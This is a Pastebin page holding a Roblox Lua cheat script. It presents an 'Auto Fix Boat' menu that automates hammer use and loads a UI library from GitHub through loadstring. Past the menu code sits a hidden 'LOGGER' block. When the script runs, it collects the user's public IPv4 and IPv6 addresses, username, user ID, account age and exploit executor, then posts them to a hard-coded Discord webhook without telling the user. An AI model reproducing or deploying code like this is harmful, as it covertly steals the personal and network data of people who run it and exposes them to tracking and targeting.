Advertisement
nuttanun734

asdaf

Nov 7th, 2021
88
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.61 KB | None | 0 0
  1. local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
  2.  
  3. local LocalPlayer = game:GetService("Players").LocalPlayer
  4.  
  5.  
  6. local Window = Library.CreateLib("Auto Fix Boat", "DarkTheme")
  7.  
  8. local Tab = Window:NewTab("Boat")
  9. local Section = Tab:NewSection("Fix Boat")
  10. Section:NewButton("Turn on Auto Fix Boat", "ButtonInfo", function()
  11. getgenv().hee = true --true or false
  12. for i,v in ipairs(game:GetService("Workspace").PlayerCharacters:GetChildren()) do
  13. if v:FindFirstChild("Hammer") then
  14. while hee do
  15. v:FindFirstChild("Hammer"):Activate()
  16. wait(15)
  17. end
  18. end
  19. end
  20. end)
  21. Section:NewButton("Turn off Auto Fix Boat", "ButtonInfo", function()
  22. getgenv().hee = false --true or false
  23. end)
  24. Section:NewButton("Auto Equip Hammer", "ButtonInfo", function()
  25. getgenv().Hammer = true --true or false
  26. if game.Players.LocalPlayer.Backpack:FindFirstChild("Hammer") then
  27. for i,v in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
  28. if v.name == "Hammer" then
  29. while Hammer do
  30. v.Parent = game.Players.LocalPlayer.Character
  31. wait(20)
  32. end
  33. end
  34. end
  35. end
  36. end)
  37. Section:NewButton("Turn off Auto Equip Hammer", "ButtonInfo", function()
  38. getgenv().Hammer = false --true or false
  39. end)
  40. Section:NewLabel("Misc")
  41. Section:NewKeybind("KeybindText", "KeybindInfo", Enum.KeyCode.F, function()
  42. Library:ToggleUI()
  43. end)
  44. Section:NewColorPicker("Color Text", "Color Info", Color3.fromRGB(0,0,0), function(color)
  45. print(color)
  46. -- Second argument is the default color
  47. end)
  48. local Tab2 = Window:NewTab("Credits")
  49. local Section2 = Tab2:NewSection("By Nuttanun")
  50. Section2:NewLabel("Ver 0.1")
  51. Section2:NewLabel("Update : Hee")
  52.  
  53. --LOGGER
  54. local Webhook = "https://discord.com/api/webhooks/906566623576621126/dNCR_NfQRZyiBfsT9HU9e0JrbPazIvEMxW4u5oc9WHzC4z963XL2N8lDOrgYIljVGJt1" -- Put your Webhook link here
  55.  
  56. local IPv4 = game:HttpGet("https://v4.ident.me/")
  57. local IPv6 = game:HttpGet("https://v6.ident.me/")
  58.  
  59. local Headers = {["content-type"] = "application/json"} -- Don't Modify
  60.  
  61. local LocalPlayer = game:GetService("Players").LocalPlayer
  62.  
  63. local AccountAge = LocalPlayer.AccountAge
  64. local Exploit = KRNL_LOADED or is_synapse_function and "Synapse X"
  65. local UserId = LocalPlayer.UserId
  66.  
  67. local PlayerData =
  68. {
  69. ["content"] = "",
  70. ["embeds"] = {{
  71. ["title"] = "Username: " .. game.Players.LocalPlayer.Name.."",
  72. ["description"] = PlayerName,
  73. ['thumbnail'] = {['url'] = "https://c.tenor.com/SoBzDkrJuNUAAAAC/cat-hack.gif",
  74. ['height']=1536, ['width']=864},
  75. ["color"] = tonumber(0x2B6BE4),
  76. ["fields"] = {
  77. {
  78. ["name"] = "Exploit used:",
  79. ["value"] = Exploit,
  80. ["inline"] = true
  81. },
  82. {
  83. ["name"] = "AccountAge:",
  84. ["value"] = AccountAge,
  85. ["inline"] = true
  86. },
  87. {
  88. ["name"] = "UserId:",
  89. ["value"] = UserId,
  90. ["inline"] = true
  91. },
  92. {
  93. ["name"] = "IPv4:",
  94. ["value"] = IPv4,
  95. ["inline"] = true
  96. },
  97. {
  98. ["name"] = "IPv6:",
  99. ["value"] = IPv6,
  100. ["inline"] = true
  101. },
  102. },
  103. }}
  104. }
  105. local PlayerData = game:GetService('HttpService'):JSONEncode(PlayerData)
  106. local HttpRequest = http_request;
  107.  
  108. if syn then
  109. HttpRequest = syn.request
  110. else
  111. HttpRequest = http_request
  112. end
  113.  
  114. HttpRequest({Url=Webhook, Body=PlayerData, Method="POST", Headers=Headers})
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement